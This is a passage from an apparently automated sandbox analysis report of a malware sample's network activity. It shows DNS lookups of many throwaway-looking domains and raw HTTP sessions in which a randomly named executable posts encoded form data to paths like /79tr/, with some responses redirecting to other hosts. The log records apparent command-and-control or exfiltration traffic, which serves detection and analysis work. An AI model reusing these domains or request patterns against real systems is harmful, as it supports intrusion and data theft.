                                                                                                        Nov 6, 2024 08:42:02.281193972 CET192.168.2.61.1.1.10x8308Standard query (0)www.cesach.netA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:16.280123949 CET192.168.2.61.1.1.10x4861Standard query (0)www.030002128.xyzA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:30.147758007 CET192.168.2.61.1.1.10x165cStandard query (0)www.auto-deals-cz-000.buzzA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:43.537723064 CET192.168.2.61.1.1.10xeef9Standard query (0)www.bzxs.infoA (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:57.310529947 CET192.168.2.61.1.1.10xd025Standard query (0)www.econsultoria.onlineA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 6, 2024 08:39:42.490822077 CET1.1.1.1192.168.2.60x3838No error (0)www.huiguang.xyz154.92.61.37A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:39:58.720695019 CET1.1.1.1192.168.2.60xbe17No error (0)www.beingandbecoming.ltdbeingandbecoming.ltdCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:39:58.720695019 CET1.1.1.1192.168.2.60xbe17No error (0)beingandbecoming.ltd3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:39:58.720695019 CET1.1.1.1192.168.2.60xbe17No error (0)beingandbecoming.ltd15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:12.281466961 CET1.1.1.1192.168.2.60x9b29No error (0)www.futurevision.life203.161.49.193A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:25.729809999 CET1.1.1.1192.168.2.60x4f79No error (0)www.schedulemassage.xyzschedulemassage.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:25.729809999 CET1.1.1.1192.168.2.60x4f79No error (0)schedulemassage.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:25.729809999 CET1.1.1.1192.168.2.60x4f79No error (0)schedulemassage.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:39.392317057 CET1.1.1.1192.168.2.60x9f42No error (0)www.mcfunding.orgmcfunding.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:39.392317057 CET1.1.1.1192.168.2.60x9f42No error (0)mcfunding.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:39.392317057 CET1.1.1.1192.168.2.60x9f42No error (0)mcfunding.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:52.951142073 CET1.1.1.1192.168.2.60x79ddNo error (0)www.migorengya8.clickmigorengya8.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:40:52.951142073 CET1.1.1.1192.168.2.60x79ddNo error (0)migorengya8.click198.252.98.54A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:06.742695093 CET1.1.1.1192.168.2.60x5068No error (0)www.klohk.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:20.757752895 CET1.1.1.1192.168.2.60x5b7bNo error (0)www.d63dm.topd63dm.topCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:20.757752895 CET1.1.1.1192.168.2.60x5b7bNo error (0)d63dm.top154.23.184.218A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:34.685213089 CET1.1.1.1192.168.2.60xdbe6No error (0)www.servannto.site31.31.196.17A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:48.763184071 CET1.1.1.1192.168.2.60x8f6fNo error (0)www.telforce.one13.248.169.48A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:41:48.763184071 CET1.1.1.1192.168.2.60x8f6fNo error (0)www.telforce.one76.223.54.146A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:02.410065889 CET1.1.1.1192.168.2.60x8308No error (0)www.cesach.net217.76.156.252A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:16.341783047 CET1.1.1.1192.168.2.60x4861No error (0)www.030002128.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:30.217531919 CET1.1.1.1192.168.2.60x165cNo error (0)www.auto-deals-cz-000.buzz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:43.557391882 CET1.1.1.1192.168.2.60xeef9No error (0)www.bzxs.info188.114.97.3A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:43.557391882 CET1.1.1.1192.168.2.60xeef9No error (0)www.bzxs.info188.114.96.3A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:58.018017054 CET1.1.1.1192.168.2.60xd025No error (0)www.econsultoria.onlineeconsultoria.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:58.018017054 CET1.1.1.1192.168.2.60xd025No error (0)econsultoria.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                        Nov 6, 2024 08:42:58.018017054 CET1.1.1.1192.168.2.60xd025No error (0)econsultoria.online15.197.148.33A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • www.huiguang.xyz
                                                                                                        • www.beingandbecoming.ltd
                                                                                                        • www.futurevision.life
                                                                                                        • www.schedulemassage.xyz
                                                                                                        • www.mcfunding.org
                                                                                                        • www.migorengya8.click
                                                                                                        • www.klohk.tech
                                                                                                        • www.d63dm.top
                                                                                                        • www.servannto.site
                                                                                                        • www.telforce.one
                                                                                                        • www.cesach.net
                                                                                                        • www.030002128.xyz
                                                                                                        • www.auto-deals-cz-000.buzz
                                                                                                        • www.bzxs.info
                                                                                                        • www.econsultoria.online

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649911154.92.61.37804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:39:42.510540962 CET549OUTGET /hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.huiguang.xyz
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:39:43.444372892 CET835INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:39:43 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 609
                                                                                                        Last-Modified: Sat, 02 Nov 2024 05:16:45 GMT
                                                                                                        Connection: close
                                                                                                        ETag: "6725b5bd-261"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 61 31 63 38 63 66 38 63 65 35 31 33 34 33 34 34 34 65 37 38 32 33 66 62 39 35 65 66 65 33 38 65 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?a1c8cf8ce51343444e7823fb95efe38e"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817/register'; }, 1000); // 1 }; </script></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.6499833.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:39:58.887490034 CET831OUTPOST /79tr/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.beingandbecoming.ltd
                                                                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a
                                                                                                        Data Ascii: DDp=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.6499843.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:01.441909075 CET855OUTPOST /79tr/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.beingandbecoming.ltd
                                                                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 39 36 38 5a 7a 37 52 67 78 63 2b 45 6e 35 54 56 66 58 75 50 6a 51 41 41 6d 52 49 77 6d 72 41 76 33 2b 39 65 43 72 56 46 33 50 39 51 3d 3d
                                                                                                        Data Ascii: DDp=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL7968Zz7Rgxc+En5TVfXuPjQAAmRIwmrAv3+9eCrVF3P9Q==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.6499853.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:03.983037949 CET1868OUTPOST /79tr/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.beingandbecoming.ltd
                                                                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 37 71 76 61 36 6c 59 71 4c 33 45 49 32 42 37 7a 6a 4c 2b 66 44 71 6c 70 38 33 72 4f 58 6d 63 49 52 58 54 50 50 2f 4f 2f 72 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 59 63 49 48 45 38 65 59 48 4a 38 51 4b 72 45 55 5a 38 4b 32 61 58 4d 63 34 48 79 6b 69 38 4d 74 48 73 79 71 70 2b 6b 73 59 4f 44 52 2b 43 56 47 67 75 36 75 48 57 6d 4c 69 36 5a 71 41 69 2f 56 69 48 2f 73 66 73 33 2b 78 70 41 34 6a 43 50 69 4f 72 2f [TRUNCATED]
                                                                                                        Data Ascii: DDp=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupqBzgRzq7qva6lYqL3EI2B7zjL+fDqlp83rOXmcIRXTPP/O/rnMe13Lh2t2GtZcapMV5z0sIjcS0nED4SkYcIHE8eYHJ8QKrEUZ8K2aXMc4Hyki8MtHsyqp+ksYODR+CVGgu6uHWmLi6ZqAi/ViH/sfs3+xpA4jCPiOr/KUqlNTU6oZd8+3WhY8yybIf74WV8yHGowbhaK9TKK/7lyvryL47uAeLbXlDdSW/3EhYvRzq5RXOCTe5EfcaP3V1BSHJCpBaW52ArDLjyrev5wgg4AK3UIentyikHZf3VObVSE70HHTn6lUn65v14CgQN1RWP0eom0U3yuwU+QkboWLLPnAi861WG8bFJryzhL0cIVWIeoJq7BfytyxmejP2TZJ1oG8N5h9fCAI4BcdKTl9Ze6v1UZmT19GEjLqRU2kUpfKFDHKjqt4lUyYRE6gLN8RcLmGGOjG+ZGw3EJU+sI243fPJpEW6L5oyb0HUVAdKHP1yclUXk/W3pEAm3u3CMT4b4HiJc6/E5wAhLYOLwdQuGMl7umQDPLUGTGxonr3qYQ/kTPGYi25uhalEWqJIDZx2bRU3S74gkZnZVgNmeYj7Wsloxq7V5BT/YhMepMImOTKB3lWsDU5n7n9gR2JGKy8G8VXUO8Q6t9cKpFy/fdo9dqCeydeOjIG+PaAWQuP9i74DpPohatSQMNHgnS5ikQ0u2Nc7Ttv8WbeaIA3QAePu0C5+3tbCbhCIywZZl2w66ITKUCdmiYVJTnOVdCOEWbD2lpQYu+wDVjE5qwrA50b3RbHEVUR9Jpn8Eh6DKkefaskXfkZqKKB8rWPq1uxiGZZ0K4oDclc [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.6499863.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:06.531075954 CET557OUTGET /79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:40:07.141361952 CET409INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Wed, 06 Nov 2024 07:40:07 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 269
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 44 70 3d 76 42 34 30 31 36 72 77 66 48 30 4d 78 74 61 77 4c 33 7a 47 59 47 61 58 59 73 49 68 38 69 50 6e 65 38 75 68 2b 6d 6e 6f 48 52 65 57 6c 6f 4e 6d 4d 37 64 70 34 46 67 72 36 77 74 4b 37 50 74 63 57 74 4e 76 73 45 30 43 70 74 33 74 51 57 74 56 51 72 5a 50 79 67 73 2b 4d 78 49 4d 55 4e 48 32 61 6b 43 66 4e 37 2f 43 7a 70 73 5a 79 4c 6a 36 71 6d 4a 31 46 31 55 75 44 4e 62 64 71 76 55 69 70 44 45 69 54 67 55 3d 26 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA"}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.649987203.161.49.193804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:12.301387072 CET822OUTPOST /hxmz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.futurevision.life
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.futurevision.life
                                                                                                        Referer: http://www.futurevision.life/hxmz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 46 35 35 34 6b 43 70 47 44 76 6b 69 58 50 45 34 38 74 65 61 53 4d 65 6b 78 4e 4d 67 74 4d 54 47 71 6b 68 4b 6a 57 4f 2b 59 7a 4b
                                                                                                        Data Ascii: DDp=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRF554kCpGDvkiXPE48teaSMekxNMgtMTGqkhKjWO+YzK
                                                                                                        Nov 6, 2024 08:40:12.982852936 CET533INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:40:12 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.649988203.161.49.193804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:14.842593908 CET846OUTPOST /hxmz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.futurevision.life
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.futurevision.life
                                                                                                        Referer: http://www.futurevision.life/hxmz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
